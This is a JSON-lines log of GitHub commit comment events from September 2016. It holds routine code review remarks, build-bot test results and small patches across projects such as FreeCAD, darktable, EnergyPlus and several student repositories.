{"id":"4625720343","type":"CommitCommentEvent","actor":{"login":"wwmayer"},"repo":{"name":"FreeCAD/FreeCAD"},"payload":{"comment":{"id":19194538,"position":5,"line":218,"path":"src/Mod/PartDesign/App/FeaturePrimitive.cpp","commit_id":"cb3da6ff9c45fe5726ad0d17580ebe6636b3ea55","created_at":"2016-09-27T17:28:19Z","updated_at":"2016-09-27T17:28:19Z","body":"Thanks, It's fixed now."}},"created_at":"2016-09-27T17:28:19Z"}
{"id":"4625722871","type":"CommitCommentEvent","actor":{"login":"poposs"},"repo":{"name":"poposs/Tennis"},"payload":{"comment":{"id":19194547,"position":null,"line":null,"path":null,"commit_id":"2928a912172a9c01b72355e336692b69efac96a3","created_at":"2016-09-27T17:28:46Z","updated_at":"2016-09-27T17:28:46Z","body":"should be \"Love-Love\" when Start game"}},"created_at":"2016-09-27T17:28:46Z"}
{"id":"4625725147","type":"CommitCommentEvent","actor":{"login":"Fastjur"},"repo":{"name":"Fastjur/SEM-Project"},"payload":{"comment":{"id":19194549,"position":null,"line":null,"path":null,"commit_id":"7e9e808f5862598fa361c46e8b4dac09b7e336fd","created_at":"2016-09-27T17:29:10Z","updated_at":"2016-09-27T17:29:10Z","body":"And this, ladies and gentlemen, is why I don't use windows @Wolgo "}},"created_at":"2016-09-27T17:29:10Z"}
{"id":"4625732011","type":"CommitCommentEvent","actor":{"login":"Fastjur"},"repo":{"name":"Fastjur/SEM-Project"},"payload":{"comment":{"id":19194559,"position":null,"line":null,"path":null,"commit_id":"e007d054b6b1d22b659a04b277e070a6e89a26e8","created_at":"2016-09-27T17:30:20Z","updated_at":"2016-09-27T17:30:20Z","body":"You might want to do this with a `commit --amend` and force push next time @Wolgo "}},"created_at":"2016-09-27T17:30:20Z"}
{"id":"4625734869","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/calamares"},"payload":{"comment":{"id":19194566,"position":null,"line":null,"path":null,"commit_id":"9fe93205556d0144217d5cc1ba3df04c80f0a694","created_at":"2016-09-27T17:30:48Z","updated_at":"2016-09-27T17:30:48Z","body":"We still need a check for already enabled DM so we don't get two displaymanagers enabled."}},"created_at":"2016-09-27T17:30:48Z"}
{"id":"4625735375","type":"CommitCommentEvent","actor":{"login":"MarkusTillman"},"repo":{"name":"Malow/NamedMutex"},"payload":{"comment":{"id":19194570,"position":2,"line":2,"path":".gitignore","commit_id":"174ddf670988f2cf205744998865d567b91bb9c3","created_at":"2016-09-27T17:30:53Z","updated_at":"2016-09-27T17:30:53Z","body":"created by eclipse? might as well stop here and now ;)"}},"created_at":"2016-09-27T17:30:53Z"}
{"id":"4625738188","type":"CommitCommentEvent","actor":{"login":"Trojaner25"},"repo":{"name":"morelinq/MoreLINQ"},"payload":{"comment":{"id":19194576,"position":null,"line":null,"path":null,"commit_id":"db8ebdf606980215e2665e24bff70c72b976ec65","created_at":"2016-09-27T17:31:23Z","updated_at":"2016-09-27T17:31:23Z","body":"Thank you 👍 "}},"created_at":"2016-09-27T17:31:23Z"}
{"id":"4625739163","type":"CommitCommentEvent","actor":{"login":"mstecklein"},"repo":{"name":"mstecklein/assignment3"},"payload":{"comment":{"id":19194580,"position":7,"line":46,"path":"Main.java","commit_id":"dd1c88f74806d21c2b5f48a650bb71d5e19906b4","created_at":"2016-09-27T17:31:34Z","updated_at":"2016-09-27T17:31:34Z","body":"It's not necessary to initialize 'words' here, the default words will be garbage collected when you reassign to it in the next line"}},"created_at":"2016-09-27T17:31:34Z"}
{"id":"4625739903","type":"CommitCommentEvent","actor":{"login":"Devwarlt"},"repo":{"name":"Devwarlt/webclient"},"payload":{"comment":{"id":19194583,"position":null,"line":null,"path":null,"commit_id":"a0d4e238835f718bc300d68415e31a61ee8df622","created_at":"2016-09-27T17:31:42Z","updated_at":"2016-09-27T17:31:42Z","body":"Added Haunted Cemetery behaviors in server resource for test until approvation by staff."}},"created_at":"2016-09-27T17:31:42Z"}
{"id":"4625740984","type":"CommitCommentEvent","actor":{"login":"athoik"},"repo":{"name":"openmips/stbgui"},"payload":{"comment":{"id":19194588,"position":null,"line":null,"path":null,"commit_id":"6cfcc0fb119d11844bd38e86b36f2c16cc64c755","created_at":"2016-09-27T17:31:52Z","updated_at":"2016-09-27T17:31:52Z","body":"With above patch applied I would try the following:\r\n\r\n```patch\r\ndiff --git a/lib/python/Components/NimManager.py b/lib/python/Components/NimManager.py\r\nindex 2e24608..0ee5951 100644\r\n--- a/lib/python/Components/NimManager.py\r\n+++ b/lib/python/Components/NimManager.py\r\n@@ -500,6 +500,13 @@ class NIM(object):\r\n        def __init__(self, slot, type, description, has_outputs = True, internally_connectable = None, multi_type = {}, frontend_id = None, i2c = None, is_empty = False):\r\n                nim_types = [\"DVB-S\", \"DVB-S2\", \"DVB-C\", \"DVB-T\", \"DVB-T2\", \"ATSC\"]\r\n\r\n+               # get current type using DVB API\r\n+               if self.frontend_id is not None:\r\n+                       dvb_type = eDVBResourceManager.getInstance().getFrontendDeliverySystem(self.frontend_id)\r\n+                       if dvb_type and dvb_type != type:\r\n+                               print \"[NIM] getFrontendDeliverySystem %s DVB %s\" % (type, dvb_type)\r\n+                               type = dvb_type\r\n+\r\n                if type and type not in nim_types:\r\n                        print \"[NIM] warning: unknown NIM type %s, not using.\" % type\r\n                        type = None\r\n```\r\n"}},"created_at":"2016-09-27T17:31:52Z"}
{"id":"4625741243","type":"CommitCommentEvent","actor":{"login":"MarkusTillman"},"repo":{"name":"Malow/NamedMutex"},"payload":{"comment":{"id":19194589,"position":1,"line":1,"path":"src/main/java/com/mooo/malow/namedmutex/NamedMutex.java","commit_id":"daaa68b26e033330870a541c2b6ef6f70d1ee5e9","created_at":"2016-09-27T17:31:55Z","updated_at":"2016-09-27T17:31:55Z","body":"moo!"}},"created_at":"2016-09-27T17:31:55Z"}
{"id":"4625754641","type":"CommitCommentEvent","actor":{"login":"corydodt"},"repo":{"name":"corydodt/Noms"},"payload":{"comment":{"id":19194622,"position":4,"line":10,"path":"chrome/scripts/noms/clipper.js","commit_id":"88c4b010f965c338c8026388cee94b9b1c556317","created_at":"2016-09-27T17:34:16Z","updated_at":"2016-09-27T17:34:16Z","body":"semicolon"}},"created_at":"2016-09-27T17:34:16Z"}
{"id":"4625761610","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19194644,"position":null,"line":null,"path":null,"commit_id":"8df72926681d9827a5ea69ab4303f30df39b1f43","created_at":"2016-09-27T17:35:27Z","updated_at":"2016-09-27T17:35:27Z","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-12: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8df72926681d9827a5ea69ab4303f30df39b1f43-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8df72926681d9827a5ea69ab4303f30df39b1f43-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-27T17:35:27Z"}
{"id":"4625765586","type":"CommitCommentEvent","actor":{"login":"mstecklein"},"repo":{"name":"mstecklein/assignment3"},"payload":{"comment":{"id":19194657,"position":33,"line":83,"path":"Main.java","commit_id":"dd1c88f74806d21c2b5f48a650bb71d5e19906b4","created_at":"2016-09-27T17:36:08Z","updated_at":"2016-09-27T17:36:08Z","body":"You should use keyboard.nextLine(), it is more fool-proof to edge cases, also it was mentioned in Piazza that we should use nextLine. Also, I am not sure what edge cases they will check, but unless the user inputs at least two words, the behavior of the program is undetermined."}},"created_at":"2016-09-27T17:36:08Z"}
{"id":"4625768900","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19194668,"position":null,"line":null,"path":null,"commit_id":"6a14d11e8810fbbeba459ed4b2d8a800b408e4b6","created_at":"2016-09-27T17:36:42Z","updated_at":"2016-09-27T17:36:42Z","body":"Note, only the pbkdf2-hmac-sha1 has a problem like this.  It appears that this 'format' must have a variable sized binary that gets put into the hash.  The others seem to cap themselves at 1 'limb' binary size."}},"created_at":"2016-09-27T17:36:42Z"}
{"id":"4625773323","type":"CommitCommentEvent","actor":{"login":"upegelow"},"repo":{"name":"darktable-org/darktable"},"payload":{"comment":{"id":19194685,"position":8,"line":514,"path":"data/kernels/extended.cl","commit_id":"af3dbae72c86279444ef147575c98b4de47eac24","created_at":"2016-09-27T17:37:28Z","updated_at":"2016-09-27T17:37:28Z","body":"True. The 'static' keyword must be removed.\n\ndarktable uses OpenCL 1.1 minus the features that are not part in OpenCL \n1.0. Or put differently: we use OpenCL 1.0 minus the features that have \nbeen deprecated in OpenCL 1.1.\n\nWe should keep it that way unless there is a real strong reason to go \nfor OpenCL 2.0 or above. According to the standard all future versions \nof OpenCL will also need to support OpenCL 1.x where 'x' is in the \ndecision of the implementation. Our subset of OpenCL is covered whatever \n'x' is chosen.\n\nUlrich\n\nAm 27.09.2016 um 18:11 schrieb Roman Lebedev:\n> @upegelow <https://github.com/upegelow> don't we require only opencl 1.1?\n>\n> I'm trying to make clang compile opencl, and i get:\n>\n> |extended.cl:514:1: error: OpenCL version 1.1 does not support the\n> 'static' storage class specifier static void ^ 1 error generated. |\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/darktable-org/darktable/commit/af3dbae72c86279444ef147575c98b4de47eac24#commitcomment-19193292>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABtf5JE305kRdZQrN5U9YzpMgfUq7-iPks5quUBHgaJpZM4KH3E2>.\n>\n\n"}},"created_at":"2016-09-27T17:37:28Z"}
{"id":"4625779235","type":"CommitCommentEvent","actor":{"login":"zhouji2013"},"repo":{"name":"geworkbench-group/geworkbench-web"},"payload":{"comment":{"id":19194700,"position":null,"line":null,"path":null,"commit_id":"55ae902a7ae59e5c5acddd19227b7bf46c3073e3","created_at":"2016-09-27T17:38:32Z","updated_at":"2016-09-27T17:38:32Z","body":"From Aris' May 24 email:\r\nFinally, we have the issue of the CPTAC components:\r\n·        TCGA Driver-Gene Inference: this should be excluded from the release and from the testing environment.\r\n·        CNKB query: This is a little tricky and may require a bit of coding. I think we need the following:\r\no   Hide from view the CPTAC interactomes, whose access requires authentication (otherwise reviewers will surely be annoyed if they try to select an interactome only to be notified they cannot access it).\r\no   Disable the links that bring up the “Interaction Details” popup, as without the CPTAC interactomes there will not be much to display there."}},"created_at":"2016-09-27T17:38:32Z"}
{"id":"4625779567","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19194704,"position":5,"line":110,"path":"chat-plugins/roomsettings.js","commit_id":"b9e33af1c071b2620d517f1b917986107be15bd0","created_at":"2016-09-27T17:38:36Z","updated_at":"2016-09-27T17:38:36Z","body":"Driver is correct; we agreed on Driver+ in SFC...\r\n\r\nChange the permission if that one is wrong..."}},"created_at":"2016-09-27T17:38:36Z"}
{"id":"4625780711","type":"CommitCommentEvent","actor":{"login":"mstecklein"},"repo":{"name":"mstecklein/assignment3"},"payload":{"comment":{"id":19194709,"position":14,"line":53,"path":"Main.java","commit_id":"dd1c88f74806d21c2b5f48a650bb71d5e19906b4","created_at":"2016-09-27T17:38:47Z","updated_at":"2016-09-27T17:38:47Z","body":"Not necessary to initialize here also"}},"created_at":"2016-09-27T17:38:47Z"}
{"id":"4625781381","type":"CommitCommentEvent","actor":{"login":"michaelkirk"},"repo":{"name":"WhisperSystems/Signal-Android"},"payload":{"comment":{"id":19194710,"position":8,"line":199,"path":"src/org/thoughtcrime/securesms/ConversationAdapter.java","commit_id":"848a25664b746f89b4435b01728247bf3d3135f4","created_at":"2016-09-27T17:38:55Z","updated_at":"2016-09-27T17:38:55Z","body":"s/Sessin/Session"}},"created_at":"2016-09-27T17:38:55Z"}
{"id":"4625782563","type":"CommitCommentEvent","actor":{"login":"GustavoPB"},"repo":{"name":"GustavoPB/CeCe-examples"},"payload":{"comment":{"id":19194716,"position":null,"line":null,"path":null,"commit_id":"ae71f0119624ceede82e41e0bf5b7714f208e17e","created_at":"2016-09-27T17:39:09Z","updated_at":"2016-09-27T17:39:09Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Comprobar el funcionamiento del bioreactor con la definición trivial de Ecoli](https://trello.com/c/5L7dMBoh/1-comprobar-el-funcionamiento-del-bioreactor-con-la-definicion-trivial-de-ecoli)"}},"created_at":"2016-09-27T17:39:09Z"}
{"id":"4625783098","type":"CommitCommentEvent","actor":{"login":"papajon"},"repo":{"name":"saenzramiro/rambox"},"payload":{"comment":{"id":19194717,"position":null,"line":null,"path":null,"commit_id":"9532a8bdfb64daec4f6232b6b3372576fed0409a","created_at":"2016-09-27T17:39:15Z","updated_at":"2016-09-27T17:39:15Z","body":"I click \"donate\" but the site never opens - just a blank page."}},"created_at":"2016-09-27T17:39:15Z"}
{"id":"4625790187","type":"CommitCommentEvent","actor":{"login":"mstecklein"},"repo":{"name":"mstecklein/assignment3"},"payload":{"comment":{"id":19194751,"position":20,"line":59,"path":"Main.java","commit_id":"dd1c88f74806d21c2b5f48a650bb71d5e19906b4","created_at":"2016-09-27T17:40:27Z","updated_at":"2016-09-27T17:40:27Z","body":"I think the ladder size will be 2 larger than the number of rungs, because it includes the start and end words"}},"created_at":"2016-09-27T17:40:27Z"}
{"id":"4625803428","type":"CommitCommentEvent","actor":{"login":"laodcn"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19194790,"position":null,"line":null,"path":null,"commit_id":"f622ddc2733b3a0361156d5231c6df6f43ab1a2b","created_at":"2016-09-27T17:42:48Z","updated_at":"2016-09-27T17:42:48Z","body":"@aofall .google-analytics.com 大陆并不能访问，还有谷歌网站管理员工具需要这个域名"}},"created_at":"2016-09-27T17:42:48Z"}
{"id":"4625805328","type":"CommitCommentEvent","actor":{"login":"lightnovelsworld"},"repo":{"name":"eliucidate/fanyi"},"payload":{"comment":{"id":19194795,"position":null,"line":null,"path":null,"commit_id":"4bfc15836fa58b389e0182894d82eb4a46aebc1b","created_at":"2016-09-27T17:43:09Z","updated_at":"2016-09-27T17:43:09Z","body":"I would like to offer you something...  I saw no way to contact you so...\r\nIt would be great if you could send me a mail at lightnovelsworld@gmail.com"}},"created_at":"2016-09-27T17:43:09Z"}
{"id":"4625805549","type":"CommitCommentEvent","actor":{"login":"timburrow"},"repo":{"name":"OpenVnmrJ/OpenVnmrJ"},"payload":{"comment":{"id":19194796,"position":null,"line":null,"path":null,"commit_id":"e0d0ff9fb2400e3fe9fc40314607482871d9e911","created_at":"2016-09-27T17:43:12Z","updated_at":"2016-09-27T17:43:12Z","body":"A gir branch is just an named commit, so you could merge any commit. In the pop up when you make a pull request, there is a place you can type in the hash for the PR.\r\n\r\nI'm building the development branch to test right now, and if that goes OK, I'll PR everything across into master."}},"created_at":"2016-09-27T17:43:12Z"}
{"id":"4625805702","type":"CommitCommentEvent","actor":{"login":"MichalBotor"},"repo":{"name":"MichalBotor/hello-world"},"payload":{"comment":{"id":19194797,"position":2,"line":2,"path":"README.md","commit_id":"c80c1152de6566be5de435469013e87b5ab7c039","created_at":"2016-09-27T17:43:14Z","updated_at":"2016-09-27T17:43:14Z","body":"I like this one."}},"created_at":"2016-09-27T17:43:14Z"}
{"id":"4625807013","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"enki-community/enki"},"payload":{"comment":{"id":19194803,"position":12,"line":323,"path":"enki/PhysicalEngine.h","commit_id":"94cfae434172e768c062248c296e666836c2952e","created_at":"2016-09-27T17:43:28Z","updated_at":"2016-09-27T17:43:28Z","body":"Thank you for the bit field! Total detail but there is a lacking spaced between the comma after pressed, and the word unsigned."}},"created_at":"2016-09-27T17:43:28Z"}
{"id":"4625809313","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19194812,"position":null,"line":null,"path":null,"commit_id":"8df72926681d9827a5ea69ab4303f30df39b1f43","created_at":"2016-09-27T17:43:54Z","updated_at":"2016-09-27T17:43:54Z","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-12: OK (1772 of 1772 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8df72926681d9827a5ea69ab4303f30df39b1f43-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8df72926681d9827a5ea69ab4303f30df39b1f43-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-27T17:43:54Z"}
{"id":"4625810206","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19194817,"position":null,"line":null,"path":null,"commit_id":"f2c06c5147517e0df169973db8af0e7cab94acb1","created_at":"2016-09-27T17:44:04Z","updated_at":"2016-09-27T17:44:04Z","body":"The following doc(s) have been deployed to the [codeofcon](https://codeofcon-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/code-of-conduct](https://codeofcon-static-docs.pantheonsite.io/docs/code-of-conduct)\n- [docs/power-users](https://codeofcon-static-docs.pantheonsite.io/docs/power-users)\n"}},"created_at":"2016-09-27T17:44:04Z"}
{"id":"4625818949","type":"CommitCommentEvent","actor":{"login":"zenithtekla"},"repo":{"name":"zenithtekla/nodeMySQL"},"payload":{"comment":{"id":19194847,"position":null,"line":null,"path":null,"commit_id":"3debee52815d965808f18ada366c0fc40a1d2bb4","created_at":"2016-09-27T17:45:36Z","updated_at":"2016-09-27T17:45:36Z","body":"```sql\r\nSELECT `ecms_equipment_table`.`id`, `ecms_equipment_table`.`model`, `ecms_equipment_table`.`asset_number`, `ecms_equipment_table`.`location_id`, `ecms_attrs_table`.`id` AS `ecms_attrs_table.id`, `ecms_attrs_table`.`last_cal` AS `ecms_attrs_table.last_cal`, `ecms_attrs_table`.\r\n`schedule` AS `ecms_attrs_table.schedule`, `ecms_attrs_table`.`next_cal` AS `ecms_attrs_table.next_cal`, `ecms_location_table`.`id` AS `ecms_location_table.id`, `ecms_location_table`.`desc` AS `ecms_location_table.desc` FROM `ecms_equipment_table` AS `ecms_equipment_table` LEFT OUTER JOIN `ECMS_attrs_table` AS `ecms_attrs_table` ON `ecms_equipment_table`.`id` = `ecms_attrs_table`.`asset_number` LEFT OUTER JOIN `ecms_location_table` AS `ecms_location_table` ON `ecms_equipment_table`.`location_id` = `ecms_location_table`.`id`;\r\n```"}},"created_at":"2016-09-27T17:45:36Z"}
{"id":"4625819089","type":"CommitCommentEvent","actor":{"login":"BalakrishnaPro"},"repo":{"name":"abhijitk7/Residential_Society_Management"},"payload":{"comment":{"id":19194848,"position":4,"line":42,"path":"SocietyManagement/pom.xml","commit_id":"e4f5a7b0e982413a01e3695b6da79a18f61741c3","created_at":"2016-09-27T17:45:38Z","updated_at":"2016-09-27T17:45:38Z","body":"Dependencies tag was misplace. Added it at the proper location."}},"created_at":"2016-09-27T17:45:38Z"}
{"id":"4625824857","type":"CommitCommentEvent","actor":{"login":"LebedevRI"},"repo":{"name":"darktable-org/darktable"},"payload":{"comment":{"id":19194873,"position":8,"line":514,"path":"data/kernels/extended.cl","commit_id":"af3dbae72c86279444ef147575c98b4de47eac24","created_at":"2016-09-27T17:46:37Z","updated_at":"2016-09-27T17:46:37Z","body":"On Tue, Sep 27, 2016 at 8:37 PM, Ulrich Pegelow <notifications@github.com>\nwrote:\n\n> True. The 'static' keyword must be removed.\n>\n> darktable uses OpenCL 1.1 minus the features that are not part in OpenCL\n> 1.0. Or put differently: we use OpenCL 1.0 minus the features that have\n> been deprecated in OpenCL 1.1.\n>\n> We should keep it that way unless there is a real strong reason to go\n> for OpenCL 2.0 or above. According to the standard all future versions\n> of OpenCL will also need to support OpenCL 1.x where 'x' is in the\n> decision of the implementation. Our subset of OpenCL is covered whatever\n> 'x' is chosen.\n>\nYep, i'm *not* proposing to change that :)\n\nShould you not pass the opencl standard version to the compiler?\n\nI think i'm getting somewhere with\nhttps://redmine.darktable.org/issues/11182,\nonce debian testing has clang-3.9, i'll make out build test-compile kernels\nif the compiler is clang-3.9+, will be helpful for CI\n\nUlrich\n>\nRoman.\n\n>\n> Am 27.09.2016 um 18:11 schrieb Roman Lebedev:\n> > @upegelow <https://github.com/upegelow> don't we require only opencl\n> 1.1?\n> >\n> > I'm trying to make clang compile opencl, and i get:\n> >\n> > |extended.cl:514:1: error: OpenCL version 1.1 does not support the\n> > 'static' storage class specifier static void ^ 1 error generated. |\n> >\n> > —\n> > You are receiving this because you were mentioned.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/darktable-org/darktable/commit/\n> af3dbae72c86279444ef147575c98b4de47eac24#commitcomment-19193292>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/\n> ABtf5JE305kRdZQrN5U9YzpMgfUq7-iPks5quUBHgaJpZM4KH3E2>.\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/darktable-org/darktable/commit/af3dbae72c86279444ef147575c98b4de47eac24#commitcomment-19194685>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAFaGASw_HwMBvKd4JeLT4j8i6jHu3NDks5quVRZgaJpZM4KH3E2>\n> .\n>\n"}},"created_at":"2016-09-27T17:46:37Z"}
{"id":"4625827646","type":"CommitCommentEvent","actor":{"login":"Orvid"},"repo":{"name":"facebook/hhvm"},"payload":{"comment":{"id":19194889,"position":null,"line":null,"path":null,"commit_id":"18188097ed6c66ebb967d9f6706b32a652114f7e","created_at":"2016-09-27T17:47:08Z","updated_at":"2016-09-27T17:47:08Z","body":"Agreed, the issue currently is that we have to update the cronjobs on each of the build VM's every time we do this, or the nightlies won't work right. Although we do know ahead of time which internal release will _probably_ be the base for the external release, we have no way of knowing for certain whether the internal release will roll out smoothly or not, and, if we've already pushed the version bump and rolling out the internal release is a mess, or if we decide to delay the external release for some reason or another (pgsql), then the version numbers will be lies.... \r\n\r\nTLDR; Bumping the version number after the release is packaged is the lest messy way to handle it :("}},"created_at":"2016-09-27T17:47:08Z"}
{"id":"4625828112","type":"CommitCommentEvent","actor":{"login":"xiazen"},"repo":{"name":"jason-bragg/Oxygen"},"payload":{"comment":{"id":19194891,"position":null,"line":null,"path":null,"commit_id":"68edefbb231fb9c3dbac58739e816c21f8320e24","created_at":"2016-09-27T17:47:13Z","updated_at":"2016-09-27T17:47:13Z","body":"I like this.\r\n\r\nI was thinking about something like \r\n```\r\nAzureStorageProvider : IStorageProvider , AzureLifecycleObservable\r\n{\r\n...\r\n} \r\n\r\nAzureLifecycleObservable: ILifecycleObservable\r\n{\r\n....\r\n}\r\n```\r\nGet ILifecycleObservable behavior through inheritance. \r\nBut this works more flexible. \r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-27T17:47:13Z"}
{"id":"4625835865","type":"CommitCommentEvent","actor":{"login":"riethm"},"repo":{"name":"softlayer/softlayer-go"},"payload":{"comment":{"id":19194910,"position":null,"line":null,"path":null,"commit_id":"84cd378b89392aa45a21cc3b03a62d0c0856dbb5","created_at":"2016-09-27T17:48:36Z","updated_at":"2016-09-27T17:48:36Z","body":"Note on above: Removed dependency on mock library from non-test files (`tests/utils.go`), to allow build to proceed without them."}},"created_at":"2016-09-27T17:48:36Z"}
{"id":"4625837614","type":"CommitCommentEvent","actor":{"login":"ivandrofly"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":19194922,"position":89,"line":89,"path":"libse/SubtitleFormats/SubUrbia.cs","commit_id":"6f9a71ba8b7732f84805e23b35ca2794695644f3","created_at":"2016-09-27T17:48:56Z","updated_at":"2016-09-27T17:48:56Z","body":"If start is read as seconds then you need to `startSeconds  * TimeCode.BaseUnit` right?"}},"created_at":"2016-09-27T17:48:56Z"}
{"id":"4625842319","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19194941,"position":null,"line":null,"path":null,"commit_id":"38e752c668444246eee5e2ac2dcfbdb07ab59142","created_at":"2016-09-27T17:49:41Z","updated_at":"2016-09-27T17:49:41Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/install](https://terminusma-static-docs.pantheonsite.io/docs/terminus/install)\n"}},"created_at":"2016-09-27T17:49:41Z"}
{"id":"4625855613","type":"CommitCommentEvent","actor":{"login":"juj"},"repo":{"name":"kripken/emscripten"},"payload":{"comment":{"id":19194984,"position":null,"line":null,"path":null,"commit_id":"86ebeec8abbe436829005b93ffdf90ee50c3727b","created_at":"2016-09-27T17:51:56Z","updated_at":"2016-09-27T17:51:56Z","body":"#4585"}},"created_at":"2016-09-27T17:51:56Z"}
{"id":"4625862895","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19195016,"position":21,"line":21,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T17:53:14Z","updated_at":"2016-09-27T17:53:14Z","body":"Please document any relevant properties of this tree? Is it balanced?"}},"created_at":"2016-09-27T17:53:14Z"}
{"id":"4625868141","type":"CommitCommentEvent","actor":{"login":"FFroehlich"},"repo":{"name":"ICB-DCM/AMICI"},"payload":{"comment":{"id":19195033,"position":13,"line":260,"path":"src/amici.c","commit_id":"63cdb7891af7abf12af8fd0c976d1e1b2fd0ae70","created_at":"2016-09-27T17:54:06Z","updated_at":"2016-09-27T17:54:06Z","body":"@paulstapor we do not really need mxg and mxr anymore right? so it should be safe to delete?"}},"created_at":"2016-09-27T17:54:06Z"}
{"id":"4625870329","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19195040,"position":27,"line":27,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T17:54:29Z","updated_at":"2016-09-27T17:54:29Z","body":"`Size` for a name is fine. `Len` is more consistent with what other containers use, and allows for a common interface to satisfy all the containers you're writing.\r\n\r\nYour choice what you want to use."}},"created_at":"2016-09-27T17:54:29Z"}
{"id":"4625872808","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19195052,"position":31,"line":31,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T17:54:55Z","updated_at":"2016-09-27T17:54:55Z","body":"// Search reports whether the value is in the tree."}},"created_at":"2016-09-27T17:54:55Z"}
{"id":"4625873313","type":"CommitCommentEvent","actor":{"login":"laodcn"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19195058,"position":null,"line":null,"path":null,"commit_id":"f622ddc2733b3a0361156d5231c6df6f43ab1a2b","created_at":"2016-09-27T17:55:00Z","updated_at":"2016-09-27T17:55:00Z","body":"我弄错了 - -|| 是因为昨天ssl.google-analytics.com 加载一些js文件失败...我已经被墙了，刚刚试了下，现在又好了"}},"created_at":"2016-09-27T17:55:00Z"}
{"id":"4625875645","type":"CommitCommentEvent","actor":{"login":"MarkusTillman"},"repo":{"name":"Malow/NamedMutex"},"payload":{"comment":{"id":19195061,"position":20,"line":20,"path":"src/main/java/com/mooo/malow/namedmutex/NamedMutex.java","commit_id":"daaa68b26e033330870a541c2b6ef6f70d1ee5e9","created_at":"2016-09-27T17:55:24Z","updated_at":"2016-09-27T17:55:24Z","body":"name never set"}},"created_at":"2016-09-27T17:55:24Z"}
{"id":"4625877722","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19195069,"position":35,"line":35,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-27T17:55:44Z","updated_at":"2016-09-27T17:55:44Z","body":"For things that are you asking yourself a question to investigate something, use TODO.\r\n\r\n```\r\n// TODO(epkann): Is there a way...?\r\n```"}},"created_at":"2016-09-27T17:55:44Z"}
{"id":"4625883970","type":"CommitCommentEvent","actor":{"login":"luandacostasilva"},"repo":{"name":"luandacostasilva/projeto-libera-o-tom"},"payload":{"comment":{"id":19195086,"position":14,"line":20,"path":"index.html","commit_id":"243a3e011ebd4e875caeeb7d89603394dc34ddf2","created_at":"2016-09-27T17:56:53Z","updated_at":"2016-09-27T17:56:53Z","body":"KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK\r\n"}},"created_at":"2016-09-27T17:56:53Z"}
{"id":"4625885046","type":"CommitCommentEvent","actor":{"login":"jippi"},"repo":{"name":"bravo-kernel/crud"},"payload":{"comment":{"id":19195091,"position":106,"line":168,"path":"src/Listener/JsonApiListener.php","commit_id":"6a70b299a063ead55c934455f5fb491c811426bb","created_at":"2016-09-27T17:57:06Z","updated_at":"2016-09-27T17:57:06Z","body":"i guess we don't need the return, since all error conditions throw exceptions ? :)"}},"created_at":"2016-09-27T17:57:06Z"}
